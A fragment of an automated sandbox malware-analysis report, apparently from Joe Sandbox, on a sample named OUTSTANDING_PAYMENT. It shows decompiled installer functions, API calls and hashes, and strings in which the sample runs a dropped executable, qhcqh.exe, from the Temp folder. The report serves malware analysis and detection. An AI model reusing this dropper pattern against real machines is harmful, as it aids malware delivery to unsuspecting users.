                                                                                                                        0x00402f69
                                                                                                                        0x00402ef5
                                                                                                                        0x00402f08
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00402f08
                                                                                                                        0x00402f90

                                                                                                                        APIs
                                                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEnum$DeleteValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1354259210-0
                                                                                                                        • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                                                                        • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                                                                                        • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                                                                        • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 77%
                                                                                                                        			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                                                                                        0x00401d81
                                                                                                                        0x00401d85
                                                                                                                        0x00401d9a
                                                                                                                        0x00401d87
                                                                                                                        0x00401d89
                                                                                                                        0x00401d8f
                                                                                                                        0x00401d8f
                                                                                                                        0x00401da0
                                                                                                                        0x00401da3
                                                                                                                        0x00401dad
                                                                                                                        0x00401db0
                                                                                                                        0x00401db8
                                                                                                                        0x00401dc9
                                                                                                                        0x00401dcc
                                                                                                                        0x00401dd7
                                                                                                                        0x00401dce
                                                                                                                        0x00401dd0
                                                                                                                        0x00401dd0
                                                                                                                        0x00401ddb
                                                                                                                        0x00401de5
                                                                                                                        0x00401e0c
                                                                                                                        0x00401e1b
                                                                                                                        0x00401e29
                                                                                                                        0x00401e31
                                                                                                                        0x00401e39
                                                                                                                        0x00401e39
                                                                                                                        0x00401e42
                                                                                                                        0x00401e48
                                                                                                                        0x00402ba4
                                                                                                                        0x00402ba4
                                                                                                                        0x00402c2d
                                                                                                                        0x00402c39

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1849352358-0
                                                                                                                        • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                                                        • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                                                                                        • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                                                        • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 73%
                                                                                                                        			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065AF();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                                                                        0x00401e4e
                                                                                                                        0x00401e59
                                                                                                                        0x00401e5b
                                                                                                                        0x00401e68
                                                                                                                        0x00401e7f
                                                                                                                        0x00401e84
                                                                                                                        0x00401e91
                                                                                                                        0x00401e96
                                                                                                                        0x00401e9a
                                                                                                                        0x00401ea5
                                                                                                                        0x00401eac
                                                                                                                        0x00401ebe
                                                                                                                        0x00401ec4
                                                                                                                        0x00401ec9
                                                                                                                        0x00401ed3
                                                                                                                        0x00402638
                                                                                                                        0x0040156d
                                                                                                                        0x00402ba4
                                                                                                                        0x00402c2d
                                                                                                                        0x00402c39

                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(?), ref: 00401E51
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                        • ReleaseDC.USER32 ref: 00401E84
                                                                                                                          • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                                          • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                                                        • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2584051700-0
                                                                                                                        • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                                                                        • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                                                                                        • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                                                                                                        • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 59%
                                                                                                                        			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                                                                        0x00401c43
                                                                                                                        0x00401c45
                                                                                                                        0x00401c4c
                                                                                                                        0x00401c4f
                                                                                                                        0x00401c52
                                                                                                                        0x00401c5c
                                                                                                                        0x00401c60
                                                                                                                        0x00401c63
                                                                                                                        0x00401c6c
                                                                                                                        0x00401c6c
                                                                                                                        0x00401c6f
                                                                                                                        0x00401c73
                                                                                                                        0x00401c7c
                                                                                                                        0x00401c7c
                                                                                                                        0x00401c7f
                                                                                                                        0x00401c83
                                                                                                                        0x00401c85
                                                                                                                        0x00401cda
                                                                                                                        0x00401cdc
                                                                                                                        0x00401ce7
                                                                                                                        0x00401cf1
                                                                                                                        0x00401cf4
                                                                                                                        0x00401cf4
                                                                                                                        0x00401cfd
                                                                                                                        0x00000000
                                                                                                                        0x00401c87
                                                                                                                        0x00401c8e
                                                                                                                        0x00401c90
                                                                                                                        0x00401c93
                                                                                                                        0x00401c99
                                                                                                                        0x00401ca0
                                                                                                                        0x00401ca3
                                                                                                                        0x00401ccb
                                                                                                                        0x00401d03
                                                                                                                        0x00401d03
                                                                                                                        0x00401ca5
                                                                                                                        0x00401cb3
                                                                                                                        0x00401cbb
                                                                                                                        0x00401cbe
                                                                                                                        0x00401cbe
                                                                                                                        0x00401ca3
                                                                                                                        0x00401d06
                                                                                                                        0x00401d09
                                                                                                                        0x00401d0f
                                                                                                                        0x00402ba4
                                                                                                                        0x00402ba4
                                                                                                                        0x00402c2d
                                                                                                                        0x00402c39

                                                                                                                        APIs
                                                                                                                        • SendMessageTimeoutW.USER32 ref: 00401CB3
                                                                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                        • String ID: !
                                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                                        • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                                                        • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                                                                                                        • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                                                                                                        • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406536 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 91%
                                                                                                                        			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t5 =  &_a4; // 0x422728
				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                                                                        0x00406544
                                                                                                                        0x00406546
                                                                                                                        0x0040655b
                                                                                                                        0x0040655e
                                                                                                                        0x00406563
                                                                                                                        0x00406568
                                                                                                                        0x004065a6
                                                                                                                        0x004065a6
                                                                                                                        0x0040656a
                                                                                                                        0x0040657c
                                                                                                                        0x00406587
                                                                                                                        0x0040658d
                                                                                                                        0x00406598
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406598
                                                                                                                        0x004065ac

                                                                                                                        APIs
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,"C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z,?,?,0040679D,80000002), ref: 0040657C
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,"C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z,"C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z,"C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z,00000000,00422728), ref: 00406587
                                                                                                                        Strings
                                                                                                                        • "C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z, xrefs: 0040653D
                                                                                                                        • ('B, xrefs: 0040655B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseQueryValue
                                                                                                                        • String ID: "C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z$('B
                                                                                                                        • API String ID: 3356406503-958788203
                                                                                                                        • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                        • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                                                                                        • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                        • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405F37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 58%
                                                                                                                        			E00405F37(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                                                                                                                        0x00405f38
                                                                                                                        0x00405f45
                                                                                                                        0x00405f46
                                                                                                                        0x00405f51
                                                                                                                        0x00405f59
                                                                                                                        0x00405f59
                                                                                                                        0x00405f61

                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                                                                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                                                                                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 2659869361-3916508600
                                                                                                                        • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                        • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                                                                                        • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                        • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 89%
                                                                                                                        			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404FFF();
						}
						L11:
						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F7F(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404610(0x413);
				return 0;
			}





                                                                                                                        0x00405642
                                                                                                                        0x0040564c
                                                                                                                        0x00405668
                                                                                                                        0x0040568a
                                                                                                                        0x0040568d
                                                                                                                        0x00405693
                                                                                                                        0x0040569d
                                                                                                                        0x0040569e
                                                                                                                        0x004056a0
                                                                                                                        0x004056a6
                                                                                                                        0x004056a6
                                                                                                                        0x004056b0
                                                                                                                        0x00000000
                                                                                                                        0x004056be
                                                                                                                        0x00405675
                                                                                                                        0x004056ad
                                                                                                                        0x004056ad
                                                                                                                        0x00000000
                                                                                                                        0x004056ad
                                                                                                                        0x00405681
                                                                                                                        0x00405683
                                                                                                                        0x00000000
                                                                                                                        0x00405683
                                                                                                                        0x00405652
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405659
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • IsWindowVisible.USER32(?), ref: 0040566D
                                                                                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                                                                                          • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
